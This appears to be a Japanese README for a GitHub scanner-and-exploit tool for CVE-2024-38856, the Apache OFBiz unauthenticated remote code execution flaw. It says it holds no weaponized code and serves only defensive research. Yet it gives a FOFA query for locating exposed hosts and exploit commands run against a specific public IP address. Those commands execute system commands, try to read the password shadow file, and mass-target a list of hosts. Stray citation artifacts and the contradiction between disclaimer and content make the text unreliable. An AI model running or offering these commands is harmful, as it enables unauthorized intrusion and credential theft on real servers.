
CVE-2024-38856: Apache OFBiz リモートコード実行スキャナー&エクスプロイト
リポジトリの目的: CVE-2024-38856(Apache OFBiz の不適切な認可 / 事前認証 RCE)に関する情報提供ドキュメント。
このリポジトリには武器化されたエクスプロイトコードは含まれていません。防御的な調査、パッチ適用の指針、検知、および安全なラボテストのみを目的としています。
CVE-2024-38856 は、Apache OFBiz における不適切な認可の脆弱性です。特定のエンドポイントへの未認証アクセスを許可し、特定の条件下ではスクリーンレンダリングコードを実行できるため、影響を受けるシステム上でリモートコード実行につながる可能性があります。この問題は Apache OFBiz 18.12.15 で修正されました。18.12.14 以前のリリースが影響を受けます。 :contentReference[oaicite:0]{index=0}
重大度/影響: 複数のセキュリティベンダーおよび研究者がこの脆弱性をクリティカルと評価しています。脆弱なインスタンスでは未認証のリモートコード実行につながる可能性があり、実際の攻撃での活発な悪用試行も確認されています。管理者は、公開された OFBiz インスタンスを優先度の高い是正対象として扱う必要があります。 :contentReference[oaicite:1]{index=1}
fofa : app="Apache_OFBiz" && port="8443"
git clone https://github.com/Hex00-0x4/CVE-2024-38856-Apache-OFBiz.gitcd CVE-2024-38856-Apache-OFBiz└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "whoami"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ifconfig"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "ls"└─$ python3 apache_bang.py --target https://139.5.191.156 --port 8443 --exploit -c "cat /etc/shodow"
─$ python3 apache_bang.py --file target.txt -c "ls"